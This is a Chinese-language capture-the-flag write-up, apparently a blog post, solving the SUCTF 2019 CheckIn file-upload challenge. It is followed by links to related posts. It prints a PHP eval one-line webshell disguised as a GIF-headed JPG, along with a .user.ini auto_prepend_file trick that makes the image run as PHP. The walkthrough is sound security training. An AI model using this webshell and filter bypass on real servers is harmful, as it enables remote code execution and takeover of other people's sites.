1、点击题目连接来到页面
2、上传正常的jpg文件,提示内容不能有<?。本来打算上传图片马,但是有过滤
3、可以改成下面的图片马:
<script language='php'>@eval($_POST['cmd']);</script>
4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传
5、必须要是图片类型,将一句话木马,添加图片头后再上传
6、上传成功了,但是需要让图片马当成php代码来执行
.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)
GIF89a
auto_prepend_file=test.jpg
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显
8、访问下面url,页面回显
9、测试,发现文件上传成功
10、使用系统函数,查看文件根目录,发现flag文件
11、输出flag
flag{cdf7e33f-1c42-4715-b628-8780eddfe13d}
![[<span style='color:red;'>SUCTF</span> <span style='color:red;'>2019</span>]<span style='color:red;'>CheckIn</span>1](https://img-blog.csdnimg.cn/direct/433178fb00bc49a584b1f1d6f86c0ac7.png)
![<span style='color:red;'>web</span>:[<span style='color:red;'>SUCTF</span> <span style='color:red;'>2019</span>]<span style='color:red;'>CheckIn</span>(一句话木马,.user.ini)](https://img-blog.csdnimg.cn/direct/3c650b6641be489c83efcefa0f98c25d.png)
![练习 9 <span style='color:red;'>Web</span> [<span style='color:red;'>SUCTF</span> <span style='color:red;'>2019</span>]<span style='color:red;'>CheckIn</span> (未拿到flag)](https://img-blog.csdnimg.cn/direct/9f5bfe78261f45cf826ba6814ecc52f5.png)
![<span style='color:red;'>BUUCTF</span>-----[SWPU<span style='color:red;'>2019</span>]<span style='color:red;'>Web</span>1](https://img-blog.csdnimg.cn/direct/705a4ab0dc654c909c9ffe70d8826d66.png)
![[<span style='color:red;'>SCTF</span><span style='color:red;'>2019</span>]babyre](https://img-blog.csdnimg.cn/direct/8582d26183c942c4914f74ec4b910821.png)
![【<span style='color:red;'>web</span> | CTF】<span style='color:red;'>BUUCTF</span> [护网杯 <span style='color:red;'>2018</span>] easy_tornado](https://img-blog.csdnimg.cn/direct/2503e15e8d6b4b668d005fedb6cb69b3.png)
![<span style='color:red;'>BUUCTF</span>——[GXYCTF<span style='color:red;'>2019</span>]BabyUpload](https://img-blog.csdnimg.cn/direct/7cfb4e8765684478a0eb01aca3ed059a.png)
![第十五届蓝桥杯pb组国赛E题[马与象] (15分)BFS算法 详解](https://img-blog.csdnimg.cn/direct/33aff3ff919f4554b7c3cefbd3617ec0.png)
